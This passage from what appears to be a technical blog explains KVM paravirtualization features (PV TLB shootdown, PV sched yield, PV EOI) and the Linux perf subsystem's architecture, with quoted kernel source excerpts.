<p>It sets the bits for the IPI target vcpus in the bitmap and finally calls kvm_hypercall4(KVM_HC_SEND_IPI).</p>
<h3> PV TLB Shootdown </h3>
<p>This feature is also from Wanpeng Li at Tencent.</p>
<p>A TLB (Translation Lookaside Buffer) is a cache containing translations from virtual memory addresses to physical memory addresses. When one CPU changes a virtual-to-physical mapping, it needs to tell the other CPUs to invalidate that mapping in their TLB caches. This is called TLB shootdown.</p>
<p>TLB shootdown is a performance-critical operation. On bare metal it is implemented by the architecture and can be completed with very low latency.</p>
<p>However, in a virtualization environment the target vCPU can be preempted or blocked. In this scenario the TLB flush initiator vCPU ends up busy-waiting for a long time until the preempted vCPU comes to run. This is inefficient.</p>
<p>With pv TLB shootdown the initiator vCPU does not wait for the sleeping vCPU; instead it just sets a flag in the guest-vmm shared area, and kvm checks this flag and does the TLB flush when the sleeping vCPU comes to run.</p>
<h4> kvm side </h4>
<p>First, as with other pv optimizations, kvm needs to expose pv tlb shootdown to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
(1 << KVM_FEATURE_NOP_IO_DELAY) |
(1 << KVM_FEATURE_CLOCKSOURCE2) |
(1 << KVM_FEATURE_ASYNC_PF) |
(1 << KVM_FEATURE_PV_EOI) |
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
(1 << KVM_FEATURE_PV_TLB_FLUSH) |
(1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |
</code></pre></div></div>
<p>PV tlb shootdown reuses the preempted field in ‘kvm_steal_time’ to expose the vcpu running/preempted information to the guest. When the vcpu transitions from preempted back to running, if kvm finds the flush flag set, it does the flush.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> record_steam_time()
{
if (xchg(&st->preempted, 0) & KVM_VCPU_FLUSH_TLB)
kvm_vcpu_flush_tlb_guest(vcpu);
}
</code></pre></div></div>
<p>When the vcpu is preempted, ‘KVM_VCPU_PREEMPTED’ will be assigned to ‘st.preempted’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_steal_time_set_preempted(struct kvm_vcpu *vcpu)
{
st->preempted = vcpu->arch.st.preempted = KVM_VCPU_PREEMPTED;
}
</code></pre></div></div>
<h4> guest side </h4>
<p>When the guest starts up, it checks whether the ‘KVM_FEATURE_PV_TLB_FLUSH’ feature is exposed. If it is, ‘kvm_flush_tlb_others’ will be replaced.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (pv_tlb_flush_supported()) {
pv_ops.mmu.flush_tlb_others = kvm_flush_tlb_others;
pv_ops.mmu.tlb_remove_table = tlb_remove_table;
pr_info("KVM setup pv remote TLB flush\n");
}
static bool pv_tlb_flush_supported(void)
{
return (kvm_para_has_feature(KVM_FEATURE_PV_TLB_FLUSH) &&
!kvm_para_has_hint(KVM_HINTS_REALTIME) &&
kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
}
</code></pre></div></div>
<h4> guest TLB flush </h4>
<p>When the guest does a pv shootdown, ‘kvm_flush_tlb_others’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_flush_tlb_others(const struct cpumask *cpumask,
const struct flush_tlb_info *info)
{
u8 state;
int cpu;
struct kvm_steal_time *src;
struct cpumask *flushmask = this_cpu_cpumask_var_ptr(__pv_cpu_mask);
cpumask_copy(flushmask, cpumask);
/*
* We have to call flush only on online vCPUs. And
* queue flush_on_enter for pre-empted vCPUs
*/
for_each_cpu(cpu, flushmask) {
src = &per_cpu(steal_time, cpu);
state = READ_ONCE(src->preempted);
if ((state & KVM_VCPU_PREEMPTED)) {
if (try_cmpxchg(&src->preempted, &state,
state | KVM_VCPU_FLUSH_TLB))
__cpumask_clear_cpu(cpu, flushmask);
}
}
native_flush_tlb_others(flushmask, info);
}
</code></pre></div></div>
<p>Here we can see it reads ‘src->preempted’; if the ‘KVM_VCPU_PREEMPTED’ bit is set, it sets ‘KVM_VCPU_FLUSH_TLB’ in ‘src->preempted’ and clears that cpu from the flush mask. Thus when that vcpu is scheduled in, it will do the TLB flush itself.</p>
<h3> PV sched yield </h3>
<p>This feature is also from Wanpeng Li, who says in the patch that the idea comes from Xen:
when sending a call-function IPI-many to vCPUs, yield (via hypercall) if any of the IPI target vCPUs was preempted.</p>
<h4> kvm side </h4>
<p>First we need to export this feature to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
...
(1 << KVM_FEATURE_PV_SCHED_YIELD) |
</code></pre></div></div>
<p>Then we need to implement the hypercall handler to process the yield hypercall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
{
case KVM_HC_SCHED_YIELD:
kvm_sched_yield(vcpu->kvm, a0);
ret = 0;
break;
}
static void kvm_sched_yield(struct kvm *kvm, unsigned long dest_id)
{
struct kvm_vcpu *target = NULL;
struct kvm_apic_map *map;
rcu_read_lock();
map = rcu_dereference(kvm->arch.apic_map);
if (likely(map) && dest_id <= map->max_apic_id && map->phys_map[dest_id])
target = map->phys_map[dest_id]->vcpu;
rcu_read_unlock();
if (target && READ_ONCE(target->ready))
kvm_vcpu_yield_to(target);
}
</code></pre></div></div>
<p>Find the target vcpu and yield to it.</p>
<h4> guest side </h4>
<p>When the guest starts up, it will replace ‘smp_ops.send_call_func_ipi’ with ‘kvm_smp_send_call_func_ipi’ if the PV sched yield feature is supported.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __init kvm_guest_init(void)
{
if (pv_sched_yield_supported()) {
smp_ops.send_call_func_ipi = kvm_smp_send_call_func_ipi;
pr_info("KVM setup pv sched yield\n");
}
}
static bool pv_sched_yield_supported(void)
{
return (kvm_para_has_feature(KVM_FEATURE_PV_SCHED_YIELD) &&
!kvm_para_has_hint(KVM_HINTS_REALTIME) &&
kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
}
</code></pre></div></div>
<h4> guest trigger call-function IPI-many </h4>
<p>When the guest sends a call-function IPI, the current vcpu first calls ‘native_send_call_func_ipi’ to send the IPI to the target vcpus. Then, if a target vCPU is preempted, it issues a ‘KVM_HC_SCHED_YIELD’ hypercall. Notice we only do this for the first preempted vcpu found, as the state of the other vcpus can change underneath us.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_smp_send_call_func_ipi(const struct cpumask *mask)
{
int cpu;
native_send_call_func_ipi(mask);
/* Make sure other vCPUs get a chance to run if they need to. */
for_each_cpu(cpu, mask) {
if (vcpu_is_preempted(cpu)) {
kvm_hypercall1(KVM_HC_SCHED_YIELD, per_cpu(x86_cpu_to_apicid, cpu));
break;
}
}
}
</code></pre></div></div>
<h3> PV EOI </h3>
<p>PV EOI is another (older) pv optimization. The idea behind pv eoi is to avoid the VM exit caused by the EOI write to the APIC, as this exit is expensive.
PV EOI uses shared memory, just like many of the optimizations above. The VMM sets a flag in this shared memory before injecting the interrupt; when the guest processes the interrupt and writes an EOI, if it finds this flag set it just clears it and returns without touching the APIC.</p>
<h4> kvm side </h4>
<p>First of all the kvm should expose this feature to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
...
(1 << KVM_FEATURE_PV_EOI) |
</code></pre></div></div>
<p>The guest writes the ‘MSR_KVM_PV_EOI_EN’ MSR to set the gpa of the shared memory and the enable bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case MSR_KVM_PV_EOI_EN:
if (kvm_lapic_enable_pv_eoi(vcpu, data, sizeof(u8)))
return 1;
int kvm_lapic_enable_pv_eoi(struct kvm_vcpu *vcpu, u64 data, unsigned long len)
{
u64 addr = data & ~KVM_MSR_ENABLED;
struct gfn_to_hva_cache *ghc = &vcpu->arch.pv_eoi.data;
unsigned long new_len;
if (!IS_ALIGNED(addr, 4))
return 1;
vcpu->arch.pv_eoi.msr_val = data;
if (!pv_eoi_enabled(vcpu))
return 0;
if (addr == ghc->gpa && len <= ghc->len)
new_len = ghc->len;
else
new_len = len;
return kvm_gfn_to_hva_cache_init(vcpu->kvm, ghc, addr, new_len);
}
</code></pre></div></div>
<p>‘apic_sync_pv_eoi_to_guest’ will be called on vmentry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_sync_pv_eoi_to_guest(struct kvm_vcpu *vcpu,
struct kvm_lapic *apic)
{
if (!pv_eoi_enabled(vcpu) ||
/* IRR set or many bits in ISR: could be nested. */
apic->irr_pending ||
/* Cache not set: could be safe but we don't bother. */
apic->highest_isr_cache == -1 ||
/* Need EOI to update ioapic. */
kvm_ioapic_handles_vector(apic, apic->highest_isr_cache)) {
/*
* PV EOI was disabled by apic_sync_pv_eoi_from_guest
* so we need not do anything here.
*/
return;
}
pv_eoi_set_pending(apic->vcpu);
}
</code></pre></div></div>
<p>‘pv_eoi_set_pending’ will set the ‘KVM_PV_EOI_ENABLED’ flag in shared memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void pv_eoi_set_pending(struct kvm_vcpu *vcpu)
{
if (pv_eoi_put_user(vcpu, KVM_PV_EOI_ENABLED) < 0) {
printk(KERN_WARNING "Can't set EOI MSR value: 0x%llx\n",
(unsigned long long)vcpu->arch.pv_eoi.msr_val);
return;
}
__set_bit(KVM_APIC_PV_EOI_PENDING, &vcpu->arch.apic_attention);
}
</code></pre></div></div>
<p>‘apic_sync_pv_eoi_from_guest’ will be called on vmexit or when an injected interrupt is cancelled.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_sync_pv_eoi_from_guest(struct kvm_vcpu *vcpu,
struct kvm_lapic *apic)
{
bool pending;
int vector;
/*
* PV EOI state is derived from KVM_APIC_PV_EOI_PENDING in host
* and KVM_PV_EOI_ENABLED in guest memory as follows:
*
* KVM_APIC_PV_EOI_PENDING is unset:
* -> host disabled PV EOI.
* KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is set:
* -> host enabled PV EOI, guest did not execute EOI yet.
* KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is unset:
* -> host enabled PV EOI, guest executed EOI.
*/
BUG_ON(!pv_eoi_enabled(vcpu));
pending = pv_eoi_get_pending(vcpu);
/*
* Clear pending bit in any case: it will be set again on vmentry.
* While this might not be ideal from performance point of view,
* this makes sure pv eoi is only enabled when we know it's safe.
*/
pv_eoi_clr_pending(vcpu);
if (pending)
return;
vector = apic_set_eoi(apic);
trace_kvm_pv_eoi(apic, vector);
}
</code></pre></div></div>
<p>‘pv_eoi_get_pending’ gets the status of the shared flag. If it is still pending, the guest did not trigger the EOI write and there is nothing to do. If the guest did trigger the EOI, ‘apic_set_eoi’ is called here to perform the EOI in the emulated APIC.
Note that ‘apic->irr_pending’ is always true with virtual interrupt delivery enabled, so I think pv eoi sees little use today, as APICv is very common.</p>
<h4> guest side </h4>
<p>When the guest starts up, it writes ‘MSR_KVM_PV_EOI_EN’ with the address of ‘kvm_apic_eoi’ and the ‘KVM_MSR_ENABLED’ bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_guest_cpu_init(void)
{
...
if (kvm_para_has_feature(KVM_FEATURE_PV_EOI)) {
unsigned long pa;
/* Size alignment is implied but just to make it explicit. */
BUILD_BUG_ON(__alignof__(kvm_apic_eoi) < 4);
__this_cpu_write(kvm_apic_eoi, 0);
pa = slow_virt_to_phys(this_cpu_ptr(&kvm_apic_eoi))
| KVM_MSR_ENABLED;
wrmsrl(MSR_KVM_PV_EOI_EN, pa);
}
...
}
</code></pre></div></div>
<p>It also sets the ‘eoi_write’ callback to ‘kvm_guest_apic_eoi_write’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void kvm_guest_init(void)
{
if (kvm_para_has_feature(KVM_FEATURE_PV_EOI))
apic_set_eoi_write(kvm_guest_apic_eoi_write);
}
void __init apic_set_eoi_write(void (*eoi_write)(u32 reg, u32 v))
{
struct apic **drv;
for (drv = __apicdrivers; drv < __apicdrivers_end; drv++) {
/* Should happen once for each apic */
WARN_ON((*drv)->eoi_write == eoi_write);
(*drv)->native_eoi_write = (*drv)->eoi_write;
(*drv)->eoi_write = eoi_write;
}
}
</code></pre></div></div>
<h4> guest trigger EOI </h4>
<p>When the guest writes an EOI, ‘kvm_guest_apic_eoi_write’ will be called.
It first checks whether ‘KVM_PV_EOI_BIT’ is set. If it is, it clears the bit and returns, avoiding the VM exit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static notrace void kvm_guest_apic_eoi_write(u32 reg, u32 val)
{
/**
* This relies on __test_and_clear_bit to modify the memory
* in a way that is atomic with respect to the local CPU.
* The hypervisor only accesses this memory from the local CPU so
* there's no need for lock or memory barriers.
* An optimization barrier is implied in apic write.
*/
if (__test_and_clear_bit(KVM_PV_EOI_BIT, this_cpu_ptr(&kvm_apic_eoi)))
return;
apic->native_eoi_write(APIC_EOI, APIC_EOI_ACK);
}
</code></pre></div></div>
Linux kernel perf architecture2020-08-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/29/perf-arch
<h3> Component overview </h3>
<p>The Linux perf subsystem is very useful for performance profiling. The following picture shows the perf subsystem components, from this <a href="https://leezhenghui.github.io/linux/2019/03/05/exploring-usdt-on-linux.html">post</a>.</p>
<p><img src="/assets/img/perf/1.png" alt="" /></p>
<p>‘perf’ is the user program that can be used to do performance profiling.</p>
<p>The only syscall exposed to userspace is perf_event_open, which returns a perf event fd. This syscall has no glibc wrapper. More info can be found in the <a href="https://www.man7.org/linux/man-pages/man2/perf_event_open.2.html">man page</a>. It is one of the most complicated syscalls in the kernel.</p>
<p>‘perf_event’ is the core struct in kernel. There are several types of perf event, such as tracepoint, software, hardware.</p>
<p>We can also attach an eBPF program to a trace event through the perf event fd.</p>
<h3> Abstract layer </h3>
<p>Following shows the abstract layer of perf.</p>
<p><img src="/assets/img/perf/2.png" alt="" /></p>
<p>Every perf event type has a corresponding PMU (performance monitoring unit). For example, the tracepoint event type has the following PMU.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<p>The hardware related PMU has the arch-spec related abstract structure like the ‘struct x86_pmu’. The hardware related structure will read/write the performance monitor MSR.</p>
<p>Every PMU is registered by calling ‘perf_pmu_register’.</p>
<h3> Perf event context </h3>
<p>perf can monitor cpu-related and task-related events, and both can have several monitored events at once. So we need a context to connect the events: this is ‘perf_event_context’.</p>
<p>There are two kinds of context, software and hardware, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum perf_event_task_context {
perf_invalid_context = -1,
perf_hw_context = 0,
perf_sw_context,
perf_nr_task_contexts,
};
</code></pre></div></div>
<p>For CPU level, the context is defined as ‘perf_cpu_context’ and is defined as percpu variable in ‘struct pmu’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pmu {
...
struct perf_cpu_context __percpu *pmu_cpu_context;
};
</code></pre></div></div>
<p>PMUs of the same context type share one ‘struct perf_cpu_context’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_pmu_register(struct pmu *pmu, const char *name, int type)
{
int cpu, ret, max = PERF_TYPE_MAX;
mutex_lock(&pmus_lock);
...
pmu->pmu_cpu_context = find_pmu_context(pmu->task_ctx_nr);
if (pmu->pmu_cpu_context)
goto got_cpu_context;
ret = -ENOMEM;
pmu->pmu_cpu_context = alloc_percpu(struct perf_cpu_context);
if (!pmu->pmu_cpu_context)
goto free_dev;
for_each_possible_cpu(cpu) {
struct perf_cpu_context *cpuctx;
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
__perf_event_init_context(&cpuctx->ctx);
lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
cpuctx->ctx.pmu = pmu;
cpuctx->online = cpumask_test_cpu(cpu, perf_online_mask);
__perf_mux_hrtimer_init(cpuctx, cpu);
cpuctx->heap_size = ARRAY_SIZE(cpuctx->heap_default);
cpuctx->heap = cpuctx->heap_default;
}
...
}
</code></pre></div></div>
<p>Following pic shows the related structure, from this <a href="https://blog.csdn.net/pwl999/article/details/81200439">post</a>.</p>
<p><img src="/assets/img/perf/3.png" alt="" /></p>
<p>For task level, the ‘task_struct’ has a pointer array defined as this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct task_struct {
struct perf_event_context *perf_event_ctxp[perf_nr_task_contexts];
};
</code></pre></div></div>
<p>Following pic shows the related structure, also from this <a href="https://blog.csdn.net/pwl999/article/details/81200439">post</a>.</p>
<p><img src="/assets/img/perf/4.png" alt="" /></p>
<p>A CPU-level perf event can be triggered whenever the cpu is online, but a task-level perf event is only triggered while the task is running.
The ‘perf_cpu_context’s ‘task_ctx’ field points to the currently running task’s perf context.</p>
<h3> Perf event context schedule </h3>
<p>One of perf’s jobs is to schedule the task’s perf_event_context in and out.</p>
<p>Following pic shows the task schedule in and out function related with perf.</p>
<p><img src="/assets/img/perf/5.png" alt="" /></p>
<p>Finally the PMU’s add and del callbacks will be called. Let’s use tracepoint as an example. The add callback is ‘perf_trace_add’ and the del callback is ‘perf_trace_del’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_trace_add(struct perf_event *p_event, int flags)
{
struct trace_event_call *tp_event = p_event->tp_event;
if (!(flags & PERF_EF_START))
p_event->hw.state = PERF_HES_STOPPED;
/*
* If TRACE_REG_PERF_ADD returns false; no custom action was performed
* and we need to take the default action of enqueueing our event on
* the right per-cpu hlist.
*/
if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_ADD, p_event)) {
struct hlist_head __percpu *pcpu_list;
struct hlist_head *list;
pcpu_list = tp_event->perf_events;
if (WARN_ON_ONCE(!pcpu_list))
return -EINVAL;
list = this_cpu_ptr(pcpu_list);
hlist_add_head_rcu(&p_event->hlist_entry, list);
}
return 0;
}
void perf_trace_del(struct perf_event *p_event, int flags)
{
struct trace_event_call *tp_event = p_event->tp_event;
/*
* If TRACE_REG_PERF_DEL returns false; no custom action was performed
* and we need to take the default action of dequeueing our event from
* the right per-cpu hlist.
*/
if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_DEL, p_event))
hlist_del_rcu(&p_event->hlist_entry);
}
</code></pre></div></div>
<p>The ‘perf_event’ will be added to or removed from the ‘tp_event->perf_events’ lists.</p>
<h3> perf_event_open flow </h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> perf_event_open
->perf_copy_attr
->get_unused_fd_flags(fd)
->perf_event_alloc
->perf_init_event
->perf_try_init_event
->pmu->event_init()
->find_get_context
->perf_install_in_context
->__perf_install_in_context
->add_event_to_ctx
->list_add_event
->perf_group_attach
->add_event_to_ctx
->fd_install
</code></pre></div></div>
<p>perf_event_open will call ‘pmu->event_init’ to initialize the event, and add the perf_event to a perf_event_context.</p>
<h3> tracepoint event in perf </h3>
<p>Recall the definition of tracepoint PMU.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<p>Let’s try to figure out how the perf subsystem monitors tracepoint events.</p>
<h4> perf event initialization </h4>
<p>‘perf_tp_event_init’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>perf_tp_event_init
->perf_trace_init
->perf_trace_event_init
->perf_trace_event_reg
->tp_event->class->reg(TRACE_REG_PERF_REGISTER)
</code></pre></div></div>
<p>‘perf_trace_init’ will find the specified tracepoint.</p>
<p>‘perf_trace_event_reg’ will allocate and initialize the ‘tp_event->perf_events’ percpu lists, and call ‘tp_event->class->reg’ with TRACE_REG_PERF_REGISTER.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int perf_trace_event_reg(struct trace_event_call *tp_event,
struct perf_event *p_event)
{
struct hlist_head __percpu *list;
int ret = -ENOMEM;
int cpu;
p_event->tp_event = tp_event;
if (tp_event->perf_refcount++ > 0)
return 0;
list = alloc_percpu(struct hlist_head);
if (!list)
goto fail;
for_each_possible_cpu(cpu)
INIT_HLIST_HEAD(per_cpu_ptr(list, cpu));
tp_event->perf_events = list;
...
ret = tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);
if (ret)
goto fail;
total_ref_count++;
return 0;
...
}
</code></pre></div></div>
<p>The ‘tp_event->class->reg’ callback is ‘trace_event_reg’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
...
#ifdef CONFIG_PERF_EVENTS
case TRACE_REG_PERF_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->perf_probe,
call);
case TRACE_REG_PERF_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->perf_probe,
call);
return 0;
case TRACE_REG_PERF_OPEN:
case TRACE_REG_PERF_CLOSE:
case TRACE_REG_PERF_ADD:
case TRACE_REG_PERF_DEL:
return 0;
#endif
}
return 0;
}
</code></pre></div></div>
<p>We can see that ‘call->class->perf_probe’ will be registered to the tracepoint. From my <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/09/ebpf-with-tracepoint">post</a> we know that this ‘perf_probe’ is ‘perf_trace_##call’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static notrace void \
perf_trace_##call(void *__data, proto) \
{ \
struct trace_event_call *event_call = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_raw_##call *entry; \
struct pt_regs *__regs; \
u64 __count = 1; \
struct task_struct *__task = NULL; \
struct hlist_head *head; \
int __entry_size; \
int __data_size; \
int rctx; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
head = this_cpu_ptr(event_call->perf_events); \
if (!bpf_prog_array_valid(event_call) && \
__builtin_constant_p(!__task) && !__task && \
hlist_empty(head)) \
return; \
\
__entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
sizeof(u64)); \
__entry_size -= sizeof(u32); \
\
entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx); \
if (!entry) \
return; \
\
perf_fetch_caller_regs(__regs); \
\
tstruct \
\
{ assign; } \
\
perf_trace_run_bpf_submit(entry, __entry_size, rctx, \
event_call, __count, __regs, \
head, __task); \
}
</code></pre></div></div>
<p>If ‘event_call->perf_events’ is empty, it indicates there is no perf_event currently added to this tracepoint.
This is the default status after ‘perf_event_open’ initializes a perf_event.</p>
<h4> perf event add </h4>
<p>When the task is scheduled in on a CPU, ‘pmu->add’ will be called, and it will link the ‘perf_event’ into the ‘event_call->perf_events’ linked lists.</p>
<h4> perf event del </h4>
<p>When the task is scheduled out from the CPU, ‘pmu->del’ will be called, and it will remove the ‘perf_event’ from the ‘event_call->perf_events’ linked lists.</p>
<h4> perf event trigger </h4>
<p>If ‘event_call->perf_events’ is not empty, ‘perf_trace_run_bpf_submit’ will be called. If no eBPF program is attached, ‘perf_tp_event’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void perf_tp_event(u16 event_type, u64 count, void *record, int entry_size,
struct pt_regs *regs, struct hlist_head *head, int rctx,
struct task_struct *task)
{
struct perf_sample_data data;
struct perf_event *event;
struct perf_raw_record raw = {
.frag = {
.size = entry_size,
.data = record,
},
};
perf_sample_data_init(&data, 0, 0);
data.raw = &raw;
perf_trace_buf_update(record, event_type);
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_tp_event_match(event, &data, regs))
perf_swevent_event(event, count, &data, regs);
}
...
perf_swevent_put_recursion_context(rctx);
}
</code></pre></div></div>
<p>For every ‘perf_event’ in the ‘event_call->perf_events’ list, it calls ‘perf_swevent_event’ to trigger a perf event.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void perf_swevent_event(struct perf_event *event, u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct hw_perf_event *hwc = &event->hw;
local64_add(nr, &event->count);
if (!regs)
return;
if (!is_sampling_event(event))
return;
if ((event->attr.sample_type & PERF_SAMPLE_PERIOD) && !event->attr.freq) {
data->period = nr;
return perf_swevent_overflow(event, 1, data, regs);
} else
data->period = event->hw.last_period;
if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
return perf_swevent_overflow(event, 1, data, regs);
if (local64_add_negative(nr, &hwc->period_left))
return;
perf_swevent_overflow(event, 0, data, regs);
}
</code></pre></div></div>
<p>‘perf_swevent_event’ adds to ‘event->count’. If the event is not a sampling event it just returns; this is the perf count mode.
If the perf_event is in sample mode, it needs to copy the tracepoint data. Following is the callchain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> perf_swevent_overflow->__perf_event_overflow->event->overflow_handler(perf_event_output).
</code></pre></div></div>
<h3> software perf event </h3>
<p>Software PMU is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_swevent = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = perf_swevent_init,
.add = perf_swevent_add,
.del = perf_swevent_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<h4> perf event initialization</h4>
<p>‘perf_swevent_init’ will be called. It calls ‘swevent_hlist_get’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int perf_swevent_init(struct perf_event *event)
{
u64 event_id = event->attr.config;
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
switch (event_id) {
case PERF_COUNT_SW_CPU_CLOCK:
case PERF_COUNT_SW_TASK_CLOCK:
return -ENOENT;
default:
break;
}
if (event_id >= PERF_COUNT_SW_MAX)
return -ENOENT;
if (!event->parent) {
int err;
err = swevent_hlist_get();
if (err)
return err;
static_key_slow_inc(&perf_swevent_enabled[event_id]);
event->destroy = sw_perf_event_destroy;
}
return 0;
}
</code></pre></div></div>
<p>This creates the percpu ‘swhash->swevent_hlist’ lists and also enables the static key ‘perf_swevent_enabled[event_id]’.</p>
<h4> perf event add </h4>
<p>‘perf_swevent_add’ adds the perf_event to the percpu hash lists.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int perf_swevent_add(struct perf_event *event, int flags)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct hw_perf_event *hwc = &event->hw;
struct hlist_head *head;
if (is_sampling_event(event)) {
hwc->last_period = hwc->sample_period;
perf_swevent_set_period(event);
}
hwc->state = !(flags & PERF_EF_START);
head = find_swevent_head(swhash, event);
if (WARN_ON_ONCE(!head))
return -EINVAL;
hlist_add_head_rcu(&event->hlist_entry, head);
perf_event_update_userpage(event);
return 0;
}
</code></pre></div></div>
<h4> perf event del </h4>
<p>‘perf_swevent_del’ removes the event from the hash list.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void perf_swevent_del(struct perf_event *event, int flags)
{
hlist_del_rcu(&event->hlist_entry);
}
</code></pre></div></div>
<h4> perf event trigger </h4>
<p>Take the task switch as an example.</p>
<p>The ‘perf_sw_event_sched’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void perf_event_task_sched_out(struct task_struct *prev,
struct task_struct *next)
{
perf_sw_event_sched(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, 0);
if (static_branch_unlikely(&perf_sched_events))
__perf_event_task_sched_out(prev, next);
}
</code></pre></div></div>
<p>After that, the perf_event_task_sched_out->___perf_sw_event->do_perf_sw_event callchain runs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct perf_event *event;
struct hlist_head *head;
rcu_read_lock();
head = find_swevent_head_rcu(swhash, type, event_id);
if (!head)
goto end;
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_swevent_match(event, type, event_id, data, regs))
perf_swevent_event(event, nr, data, regs);
}
